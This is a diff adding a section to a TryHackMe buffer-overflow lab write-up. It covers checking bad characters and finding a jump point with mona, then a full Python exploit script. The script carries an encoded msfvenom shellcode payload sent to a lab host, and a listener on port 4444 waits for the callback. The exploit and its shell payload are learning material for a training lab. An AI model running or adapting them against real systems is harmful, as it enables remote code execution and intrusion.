--- a/TryHackMe/Buffer_Overflow_Prep/3.md
+++ b/TryHackMe/Buffer_Overflow_Prep/3.md
@@ -260,3 +260,99 @@ try:
 except:
     print("Could not connect.")
 ```
+
+Rerunning the script, I take not of the new ESP address value
+
+![image](https://user-images.githubusercontent.com/83407557/185434753-ffb6f885-2faa-44be-a7d5-d1a8682a5d50.png)
+
+Then use mona compare:
+
+![image](https://user-images.githubusercontent.com/83407557/185434939-b1c325cb-e0c3-43c6-9d33-4883d722efe4.png)
+
+and find that no more bad chars are being detected.
+
+# Finding a jump point.
+
+Now that I have my bad characters mapped out, I can use mona to search for a jump ESP insctruction that doesn't contain any of these characters.
+
+`!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"`
+
+With this I find two valid jump points
+
+![image](https://user-images.githubusercontent.com/83407557/185435641-7f54bd6e-477b-4d60-913c-d9bd41a10035.png)
+
+
+# Creating shellcode
+
+Using msfvenom and the badchars I found I can also now create my shellcode:
+
+![image](https://user-images.githubusercontent.com/83407557/185436736-9515e47c-5709-48a5-b666-da0879f94b37.png)
+
+
+# Creating exploit.py
+
+I now can add my shellcode as a payload, and fill in the retrn address variable to one of the jump points I found, I also make a NOP sled to make sure that there is room for the encoder stub for the padding variable:
+
+```python
+#!/usr/bin/env python3
+import socket
+
+ip = "10.10.151.246"
+port = 1337
+
+prefix = "OVERFLOW3 "
+offset = 1274
+overflow = "A" * offset
+retn = "\x03\x12\x50\x62"
+padding = "\x90" * 16
+payload = ("\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
+"\xff\xff\x48\xbb\x34\xca\x6f\x21\xbb\x15\x81\x70\x48\x31\x58"
+"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xc8\x82\xec\xc5\x4b\xfd"
+"\x41\x70\x34\xca\x2e\x70\xfa\x45\xd3\x21\x62\x82\x5e\xf3\xde"
+"\x5d\x0a\x22\x54\x82\xe4\x73\xa3\x5d\x0a\x22\x14\x82\xe4\x53"
+"\xeb\x5d\x8e\xc7\x7e\x80\x22\x10\x72\x5d\xb0\xb0\x98\xf6\x0e"
+"\x5d\xb9\x39\xa1\x31\xf5\x03\x62\x60\xba\xd4\x63\x9d\x66\x8b"
+"\x3e\x69\x30\x47\xa1\xfb\x76\xf6\x27\x20\x6b\x9e\x01\xf8\x34"
+"\xca\x6f\x69\x3e\xd5\xf5\x17\x7c\xcb\xbf\x71\x30\x5d\x99\x34"
+"\xbf\x8a\x4f\x68\xba\xc5\x62\x26\x7c\x35\xa6\x60\x30\x21\x09"
+"\x38\x35\x1c\x22\x10\x72\x5d\xb0\xb0\x98\x8b\xae\xe8\xb6\x54"
+"\x80\xb1\x0c\x2a\x1a\xd0\xf7\x16\xcd\x54\x3c\x8f\x56\xf0\xce"
+"\xcd\xd9\x34\xbf\x8a\x4b\x68\xba\xc5\xe7\x31\xbf\xc6\x27\x65"
+"\x30\x55\x9d\x39\x35\x1a\x2e\xaa\xbf\x9d\xc9\x71\xe4\x8b\x37"
+"\x60\xe3\x4b\xd8\x2a\x75\x92\x2e\x78\xfa\x4f\xc9\xf3\xd8\xea"
+"\x2e\x73\x44\xf5\xd9\x31\x6d\x90\x27\xaa\xa9\xfc\xd6\x8f\xcb"
+"\x35\x32\x68\x05\x62\xf2\x42\x6b\xf9\x5d\x21\xbb\x54\xd7\x39"
+"\xbd\x2c\x27\xa0\x57\xb5\x80\x70\x34\x83\xe6\xc4\xf2\xa9\x83"
+"\x70\x25\x96\x65\x27\xf6\x33\xc0\x24\x7d\x43\x8b\x6d\x32\xe4"
+"\xc0\xca\x78\xbd\x49\x26\x44\xc0\xcd\xf9\xde\xa2\x6e\x20\xbb"
+"\x15\xd8\x31\x8e\xe3\xef\x4a\xbb\xea\x54\x20\x64\x87\x5e\xe8"
+"\xf6\x24\x41\x38\xcb\x0a\x27\xa8\x79\x5d\x7e\xb0\x7c\x43\xae"
+"\x60\x01\xff\x8e\xaf\xd4\x35\xba\x69\x32\xd2\xeb\x60\x75\x92"
+"\x23\xa8\x59\x5d\x08\x89\x75\x70\xf6\x84\xcf\x74\x7e\xa5\x7c"
+"\x4b\xab\x61\xb9\x15\x81\x39\x8c\xa9\x02\x45\xbb\x15\x81\x70"
+"\x34\x8b\x3f\x60\xeb\x5d\x08\x92\x63\x9d\x38\x6c\x8a\xd5\xeb"
+"\x7d\x6d\x8b\x3f\xc3\x47\x73\x46\x34\x10\x9e\x6e\x20\xf3\x98"
+"\xc5\x54\x2c\x0c\x6f\x49\xf3\x9c\x67\x26\x64\x8b\x3f\x60\xeb"
+"\x54\xd1\x39\xcb\x0a\x2e\x71\xf2\xea\x49\x3d\xbd\x0b\x23\xa8"
+"\x7a\x54\x3b\x09\xf8\xf5\xe9\xde\x6e\x5d\xb0\xa2\x7c\x35\xa5"
+"\xaa\xb5\x54\x3b\x78\xb3\xd7\x0f\xde\x6e\xae\x61\x6d\x1e\xc0"
+"\x2e\x9b\x1d\x80\x3c\xed\xcb\x1f\x27\xa2\x7f\x3d\xbd\x76\x48"
+"\xc0\xef\xda\x5b\x60\x84\xcb\x73\xd9\x1d\x4e\xd1\x15\xd8\x31"
+"\xbd\x10\x90\xf4\xbb\x15\x81\x70")
+postfix = ""
+
+buffer = prefix + overflow + retn + padding + payload + postfix
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    s.connect((ip, port))
+    print("Sending evil buffer...")
+    s.send(bytes(buffer + "\r\n", "latin-1"))
+    print("Done!")
+except:
+    print("Could not connect.")
+```
+
+Starting a listener on port 4444, I restart oscp.exe and run the above script to get a callback:
+
